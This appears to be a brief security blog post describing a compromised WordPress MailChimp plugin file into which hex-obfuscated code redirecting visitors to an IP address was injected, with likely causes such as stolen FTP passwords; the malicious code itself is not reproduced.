CMS Plugins: a real source of infections

When looking at malicious websites, most of us think of obfuscated javascript within HTML pages, that most of the time redirect to some external exploit page.

One other location (a little less obvious) is within existing plugins used by popular CMS software such as WordPress.

Here is a particular one: wp-content/plugins/mailchimp/js/scrollTo.js?ver=1.2.6

A picture is worth of thousand words, so let’s explain what this means. With the green rectangle is the original code. In the red box is the code that was added to it. Essentially, the plugin will still work fine, but a new piece of functionality has been added!

This obfuscated code (hexadecimal), actually writes something nasty:

It is a redirection to an IP address with a parameter attached to it.

Case in point, plugins can be tampered with, just as easily as a binary or html source code can be.

Interestingly, this plugin is up-to-date, so the old adage “keep your software patched up” is somewhat irrelevant here.

There are many ways this sort of thing can happen. The easiest and often forgotten one is through stolen (or easy to guess) FTP passwords. And of course the classic software vulnerabilities are also a prime target by hackers to inject malicious content.

Jerome Segura

To find out if your website has any security holes before it’s too late, please go to SparkTrust.com.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>